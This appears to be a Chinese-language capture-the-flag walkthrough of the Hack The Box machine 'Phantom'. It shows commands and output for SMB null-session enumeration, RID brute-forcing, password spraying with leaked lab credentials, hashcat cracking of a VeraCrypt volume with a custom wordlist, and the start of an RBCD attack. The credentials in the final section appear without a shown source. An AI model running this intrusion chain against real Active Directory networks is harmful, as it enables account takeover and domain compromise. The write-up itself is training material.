Phantom(幻影)
Should you need to crack a hash, use a short custom wordlist based on company name and simple mutation rules commonly seen in real life passwords (e.g. year and a special character).
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nmap 10.129.234.63 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 09:09 EDT
Nmap scan report for 10.129.234.63
Host is up (0.37s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
50650/tcp open unknown
50651/tcp open unknown
50658/tcp open unknown
52771/tcp open unknown
52796/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 57.96 seconds
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nmap 10.129.234.63 -p 53,88,135,139,389,445,464,593,636,3268,3269,3389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 09:18 EDT
Nmap scan report for DC.phantom.vl (10.129.234.63)
Host is up (0.051s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-26 13:18:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-10-26T13:19:14+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC.phantom.vl
| Not valid before: 2025-10-25T13:02:03
|_Not valid after: 2026-04-26T13:02:03
| rdp-ntlm-info:
| Target_Name: PHANTOM
| NetBIOS_Domain_Name: PHANTOM
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: phantom.vl
| DNS_Computer_Name: DC.phantom.vl
| DNS_Tree_Name: phantom.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-26T13:18:34+00:00
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-26T13:18:36
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.07 seconds
1.2. SMB空会话泄露默认密码
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u guest -p '' --shares
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\guest:
SMB 10.129.234.63 445 DC [*] Enumerated shares
SMB 10.129.234.63 445 DC Share Permissions Remark
SMB 10.129.234.63 445 DC ----- ----------- ------
SMB 10.129.234.63 445 DC ADMIN$ Remote Admin
SMB 10.129.234.63 445 DC C$ Default share
SMB 10.129.234.63 445 DC Departments Share
SMB 10.129.234.63 445 DC IPC$ READ Remote IPC
SMB 10.129.234.63 445 DC NETLOGON Logon server share
SMB 10.129.234.63 445 DC Public READ
SMB 10.129.234.63 445 DC SYSVOL Logon server share
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# smbclient //10.129.234.63/Public -U "" -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 11 11:03:14 2024
.. DHS 0 Thu Aug 14 07:55:49 2025
tech_support_email.eml A 14565 Sat Jul 6 12:08:43 2024
6127103 blocks of size 4096. 1786592 blocks available
smb: \> get tech_support_email.eml
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (34.7 KiloBytes/sec) (average 34.7 KiloBytes/sec)
smb: \> exit
亲爱的技术支持团队:
我已经完成了新员工入职欢迎邮件的新模板。
请查看附件中的示例模板。请从现在开始对所有新员工使用此模板。
此致
敬礼
Anthony Lucas
默认密码 Ph4nt0m@5t4rt!
下一步只需要用户了
因为存在匿名访问,直接RID枚举
1.3. RID枚举获取域用户
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u guest -p '' --rid-brute
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\guest:
SMB 10.129.234.63 445 DC 498: PHANTOM\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.63 445 DC 500: PHANTOM\Administrator (SidTypeUser)
SMB 10.129.234.63 445 DC 501: PHANTOM\Guest (SidTypeUser)
SMB 10.129.234.63 445 DC 502: PHANTOM\krbtgt (SidTypeUser)
SMB 10.129.234.63 445 DC 512: PHANTOM\Domain Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 513: PHANTOM\Domain Users (SidTypeGroup)
SMB 10.129.234.63 445 DC 514: PHANTOM\Domain Guests (SidTypeGroup)
SMB 10.129.234.63 445 DC 515: PHANTOM\Domain Computers (SidTypeGroup)
SMB 10.129.234.63 445 DC 516: PHANTOM\Domain Controllers (SidTypeGroup)
SMB 10.129.234.63 445 DC 517: PHANTOM\Cert Publishers (SidTypeAlias)
SMB 10.129.234.63 445 DC 518: PHANTOM\Schema Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 519: PHANTOM\Enterprise Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 520: PHANTOM\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.234.63 445 DC 521: PHANTOM\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.63 445 DC 522: PHANTOM\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.234.63 445 DC 525: PHANTOM\Protected Users (SidTypeGroup)
SMB 10.129.234.63 445 DC 526: PHANTOM\Key Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 527: PHANTOM\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 553: PHANTOM\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.234.63 445 DC 571: PHANTOM\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.234.63 445 DC 572: PHANTOM\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.234.63 445 DC 1000: PHANTOM\DC$ (SidTypeUser)
SMB 10.129.234.63 445 DC 1101: PHANTOM\DnsAdmins (SidTypeAlias)
SMB 10.129.234.63 445 DC 1102: PHANTOM\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.234.63 445 DC 1103: PHANTOM\svc_sspr (SidTypeUser)
SMB 10.129.234.63 445 DC 1104: PHANTOM\TechSupports (SidTypeGroup)
SMB 10.129.234.63 445 DC 1105: PHANTOM\Server Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 1106: PHANTOM\ICT Security (SidTypeGroup)
SMB 10.129.234.63 445 DC 1107: PHANTOM\DevOps (SidTypeGroup)
SMB 10.129.234.63 445 DC 1108: PHANTOM\Accountants (SidTypeGroup)
SMB 10.129.234.63 445 DC 1109: PHANTOM\FinManagers (SidTypeGroup)
SMB 10.129.234.63 445 DC 1110: PHANTOM\EmployeeRelations (SidTypeGroup)
SMB 10.129.234.63 445 DC 1111: PHANTOM\HRManagers (SidTypeGroup)
SMB 10.129.234.63 445 DC 1112: PHANTOM\rnichols (SidTypeUser)
SMB 10.129.234.63 445 DC 1113: PHANTOM\pharrison (SidTypeUser)
SMB 10.129.234.63 445 DC 1114: PHANTOM\wsilva (SidTypeUser)
SMB 10.129.234.63 445 DC 1115: PHANTOM\elynch (SidTypeUser)
SMB 10.129.234.63 445 DC 1116: PHANTOM\nhamilton (SidTypeUser)
SMB 10.129.234.63 445 DC 1117: PHANTOM\lstanley (SidTypeUser)
SMB 10.129.234.63 445 DC 1118: PHANTOM\bbarnes (SidTypeUser)
SMB 10.129.234.63 445 DC 1119: PHANTOM\cjones (SidTypeUser)
SMB 10.129.234.63 445 DC 1120: PHANTOM\agarcia (SidTypeUser)
SMB 10.129.234.63 445 DC 1121: PHANTOM\ppayne (SidTypeUser)
SMB 10.129.234.63 445 DC 1122: PHANTOM\ibryant (SidTypeUser)
SMB 10.129.234.63 445 DC 1123: PHANTOM\ssteward (SidTypeUser)
SMB 10.129.234.63 445 DC 1124: PHANTOM\wstewart (SidTypeUser)
SMB 10.129.234.63 445 DC 1125: PHANTOM\vhoward (SidTypeUser)
SMB 10.129.234.63 445 DC 1126: PHANTOM\crose (SidTypeUser)
SMB 10.129.234.63 445 DC 1127: PHANTOM\twright (SidTypeUser)
SMB 10.129.234.63 445 DC 1128: PHANTOM\fhanson (SidTypeUser)
SMB 10.129.234.63 445 DC 1129: PHANTOM\cferguson (SidTypeUser)
SMB 10.129.234.63 445 DC 1130: PHANTOM\alucas (SidTypeUser)
SMB 10.129.234.63 445 DC 1131: PHANTOM\ebryant (SidTypeUser)
SMB 10.129.234.63 445 DC 1132: PHANTOM\vlynch (SidTypeUser)
SMB 10.129.234.63 445 DC 1133: PHANTOM\ghall (SidTypeUser)
SMB 10.129.234.63 445 DC 1134: PHANTOM\ssimpson (SidTypeUser)
SMB 10.129.234.63 445 DC 1135: PHANTOM\ccooper (SidTypeUser)
SMB 10.129.234.63 445 DC 1136: PHANTOM\vcunningham (SidTypeUser)
SMB 10.129.234.63 445 DC 1137: PHANTOM\SSPR Service (SidTypeGroup)
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u valid_users -p 'Ph4nt0m@5t4rt!' --continue-on-success
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [-] phantom.vl\Administrator:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\Guest:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\krbtgt:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\DC$:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\svc_sspr:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\rnichols:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\pharrison:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\wsilva:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\elynch:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\nhamilton:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\lstanley:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\bbarnes:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\cjones:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\agarcia:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ppayne:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
SMB 10.129.234.63 445 DC [-] phantom.vl\ssteward:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\wstewart:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\vhoward:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\crose:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\twright:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\fhanson:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\cferguson:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\alucas:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ebryant:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\vlynch:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ghall:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ssimpson:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ccooper:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\vcunningham:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
1.4. bloodhound
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodhound-ce-python -c All -p 'Ph4nt0m@5t4rt!' -u ibryant -d phantom.vl -ns 10.129.234.63 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: phantom.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.phantom.vl
INFO: Testing resolved hostname connectivity dead:beef::5ca7:7042:ef92:3073
INFO: Trying LDAP connection to dead:beef::5ca7:7042:ef92:3073
INFO: Testing resolved hostname connectivity dead:beef::165
INFO: Trying LDAP connection to dead:beef::165
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.phantom.vl
INFO: Testing resolved hostname connectivity dead:beef::5ca7:7042:ef92:3073
INFO: Trying LDAP connection to dead:beef::5ca7:7042:ef92:3073
INFO: Testing resolved hostname connectivity dead:beef::165
INFO: Trying LDAP connection to dead:beef::165
INFO: Found 30 users
INFO: Found 61 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.phantom.vl
INFO: Done in 00M 15S
INFO: Compressing output into 20251026095008_bloodhound.zip
没东西
1.5. SMB内部共享文件
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# impacket-smbclient ibryant@dc.phantom.vl -dc-ip 10.129.234.63 -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
Departments Share
IPC$
NETLOGON
Public
SYSVOL
# use Departments Share
# ls
drw-rw-rw- 0 Sat Jul 6 12:25:31 2024 .
drw-rw-rw- 0 Thu Aug 14 07:55:49 2025 ..
drw-rw-rw- 0 Sat Jul 6 12:25:11 2024 Finance
drw-rw-rw- 0 Sat Jul 6 12:21:31 2024 HR
drw-rw-rw- 0 Thu Jul 11 10:59:02 2024 IT
# ls
drw-rw-rw- 0 Thu Jul 11 10:59:02 2024 .
drw-rw-rw- 0 Sat Jul 6 12:25:31 2024 ..
drw-rw-rw- 0 Sat Jul 6 14:04:34 2024 Backup
-rw-rw-rw- 43593728 Sat Jul 6 12:25:36 2024 mRemoteNG-Installer-1.76.20.24615.msi
-rw-rw-rw- 32498992 Sat Jul 6 12:26:59 2024 TeamViewerQS_x64.exe
-rw-rw-rw- 80383920 Sat Jul 6 12:27:15 2024 TeamViewer_Setup_x64.exe
>>>> -rw-rw-rw- 9201076 Thu Jul 11 10:59:06 2024 veracrypt-1.26.7-Ubuntu-22.04-amd64.deb
-rw-rw-rw- 86489296 Sat Jul 6 12:25:36 2024 Wireshark-4.2.5-x64.exe
# ls
drw-rw-rw- 0 Sat Jul 6 14:04:34 2024 .
drw-rw-rw- 0 Thu Jul 11 10:59:02 2024 ..
>>>> -rw-rw-rw- 12582912 Sat Jul 6 14:04:34 2024 IT_BACKUP_201123.hc
1.6. 社工字典破解veracrypt加密卷
应该是一个veracrypt 加密的文件
这里问AI可以叫他帮我们生成一个社工字典
Phantom2020
Phantom2020!
Phantom2021
Phantom2021!
Phantom2023
Phantom2023!
Phantom2024
Phantom2024!
Phantom@2020
Phantom@2024
phantom2020
phantom2020!
phantom2024
phantom2024!
Backup2020
Backup2020!
Backup2021
Backup2023
Backup2024
Backup2024!
ITBackup2020
ITBackup2020!
ITBackup2021
ITBackup2024
PhantomIT2020
PhantomIT2020!
PhantomBackup2020
PhantomBackup2020!
PhantomSSPR2020
然后破解的时候需要选择哈希模式,因为知道了版本,直接问AI,
IT_BACKUP_201123.hc:Phantom2023!
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13721 (VeraCrypt SHA512 + XTS 512 bit (legacy))
Hash.Target......: IT_BACKUP_201123.hc
Time.Started.....: Sun Oct 26 10:24:34 2025 (2 secs)
Time.Estimated...: Sun Oct 26 10:24:36 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14 H/s (1.76ms) @ Accel:128 Loops:1000 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 29/29 (100.00%)
Rejected.........: 0/29 (0.00%)
Restore.Point....: 0/29 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:499000-499999
Candidate.Engine.: Device Generator
Candidates.#1....: Phantom2020 -> PhantomSSPR2020
Hardware.Mon.#1..: Util: 52%
Started: Sun Oct 26 10:23:59 2025
Stopped: Sun Oct 26 10:24:37 2025
密码 Phantom2023!
┌──(root㉿kali)-[~/Desktop/htb/Phantom/veracrypt]
└─# ls -la
total 11196
drwxr-xr-x 2 root root 4096 Oct 26 10:28 .
drwxr-xr-x 3 root root 4096 Oct 26 10:28 ..
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_0805.json
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_1023.json
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_1104.json
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_1123.json
-rw-r--r-- 1 root root 1012407 Oct 26 10:28 splunk_logs_1003
-rw-r--r-- 1 root root 1012407 Oct 26 10:28 splunk_logs_1102
-rw-r--r-- 1 root root 1012407 Oct 26 10:28 splunk_logs1203
-rw-r--r-- 1 root root 19348 Oct 26 10:28 ticketing_system_backup.zip
-rw-r--r-- 1 root root 8191211 Oct 26 10:28 vyos_backup.tar.gz
有个 ticketing_system_backup.zip 一看就很重要
┌──(root㉿kali)-[~/…/htb/Phantom/veracrypt/ticketing]
└─# ls
ticketing_system_backup_0806.sql ticketing_system_backup_0910.sql ticketing_system_backup_1101.sql
ticketing_system_backup_0908.sql ticketing_system_backup_1011.sql ticketing_system_backup_1105.sql
看了一下sql文件,没有利用的东西
就是一些公司的工单系统数据
还有一个备份文件压缩包
┌──(root㉿kali)-[~/Desktop/htb/Phantom/veracrypt]
└─# ls -la
total 11252
drwxr-xr-x 14 root root 4096 Jul 6 2024 .
drwxr-xr-x 3 root root 4096 Oct 26 10:28 ..
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_0805.json
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_1023.json
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_1104.json
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_1123.json
lrwxrwxrwx 1 root root 7 Jul 5 2024 bin -> usr/bin
>>>> drwxrwsr-x 7 root messagebus 4096 Jul 6 2024 config
drwxr-xr-x 128 root root 12288 Jul 6 2024 etc
drwxr-xr-x 4 root root 4096 Jul 6 2024 home
lrwxrwxrwx 1 root root 7 Jul 5 2024 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Jul 5 2024 lib64 -> usr/lib64
drwxr-xr-x 2 root root 4096 Jul 5 2024 media
drwxr-xr-x 2 root root 4096 Jul 5 2024 mnt
drwxr-xr-x 3 root root 4096 Jul 6 2024 opt
drwx------ 4 root root 4096 Jul 6 2024 root
drwxr-xr-x 44 root root 4096 Jul 6 2024 run
lrwxrwxrwx 1 root root 8 Jul 5 2024 sbin -> usr/sbin
-rw-r--r-- 1 root root 1012407 Oct 26 10:28 splunk_logs_1003
-rw-r--r-- 1 root root 1012407 Oct 26 10:28 splunk_logs_1102
-rw-r--r-- 1 root root 1012407 Oct 26 10:28 splunk_logs1203
drwxr-xr-x 4 root root 4096 Jul 5 2024 srv
drwxr-xr-x 2 root root 4096 Oct 26 10:29 ticketing
-rw-r--r-- 1 root root 19348 Oct 26 10:28 ticketing_system_backup.zip
drwxrwxrwt 10 root root 4096 Jul 6 2024 tmp
drwxr-xr-x 13 root root 4096 Jul 5 2024 var
-rw-r--r-- 1 root root 8191211 Oct 26 10:28 vyos_backup.tar.gz
可以发现有一个所属组不是root,看一下
┌──(root㉿kali)-[~/…/htb/Phantom/veracrypt/config]
└─# tree ./
./
├── archive
│ ├── commits
│ ├── config.boot
│ ├── config.boot.0.gz
│ ├── config.boot.1.gz
│ ├── config.boot.2.gz
│ ├── config.boot.3.gz
│ ├── config.boot.4.gz
│ ├── config.boot.5.gz
│ ├── config.boot.6.gz
│ ├── config.boot.7.gz
│ ├── config.boot.8.gz
│ ├── lr.conf
│ └── lr.state
├── auth
├── config.boot
├── scripts
│ ├── vyos-postconfig-bootup.script
│ └── vyos-preconfig-bootup.script
├── support
├── user-data
└── vyos-activate.log
6 directories, 17 files
┌──(root㉿kali)-[~/…/htb/Phantom/veracrypt/config]
└─# grep 'password' ./*
grep: ./archive: Is a directory
grep: ./auth: Is a directory
./config.boot: password-protected
./config.boot: password-protected
./config.boot: encrypted-password "$6$rounds=656000$6diBtlKOC2mmpMcP$G.DyFWB.fDoVSEfQN197v8lkGZbj6AI91P39eiNYoF8ymQoK11F.mLuQ6ulUFAxPkYMxVOq.WnkBwzmEWu81H."
./config.boot: encrypted-password "$6$rounds=656000$Etl2frgw6IuOffzT$LPX5DjrOKSiVnTjPSLMnVevH4Y4eMf7SEWL6V8eH8GNUSDbFZX7Hj/jFvEGspjAtRY1lLohfGfOiraR1UGiDh."
./config.boot: plaintext-password ""
./config.boot: password "gB6XTcqVP5MlP7Rc"
grep: ./scripts: Is a directory
grep: ./support: Is a directory
grep: ./user-data: Is a directory
可以发现有一个密码 gB6XTcqVP5MlP7Rc
密码喷洒
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u valid_users -p 'gB6XTcqVP5MlP7Rc' --continue-on-success
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [-] phantom.vl\Administrator:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\Guest:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\krbtgt:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\DC$:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
SMB 10.129.234.63 445 DC [-] phantom.vl\rnichols:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\pharrison:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\wsilva:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\elynch:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\nhamilton:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\lstanley:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\bbarnes:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\cjones:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\agarcia:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ppayne:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ibryant:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ssteward:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\wstewart:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\vhoward:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\crose:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\twright:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\fhanson:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\cferguson:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\alucas:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ebryant:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\vlynch:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ghall:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ssimpson:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ccooper:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\vcunningham:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u svc_sspr -p 'gB6XTcqVP5MlP7Rc' --generate-tgt svc_sspr
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
SMB 10.129.234.63 445 DC [+] TGT saved to: svc_sspr.ccache
SMB 10.129.234.63 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=svc_sspr.ccache
bingo! 拿下了
2. System
2.1. RBCD on SPN-less users
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u RNICHOLS -p 'Admin123' --generate-tgt phichols
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\RNICHOLS:Admin123
SMB 10.129.234.63 445 DC [+] TGT saved to: phichols.ccache
SMB 10.129.234.63 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=phichols.ccache
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# export KRB5CCNAME=phichols.ccache
看基本条件信息
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc ldap 10.129.234.63 -u RNICHOLS -p 'Admin123' -M maq
LDAP 10.129.234.63 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:phantom.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.63 389 DC [+] phantom.vl\RNICHOLS:Admin123
MAQ 10.129.234.63 389 DC [*] Getting the MachineAccountQuota
MAQ 10.129.234.63 389 DC MachineAccountQuota: 0
不能创建计算机
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodyAD --host dc.phantom.vl -d phantom.vl -k get object RNICHOLS --attr servicePrincipalName
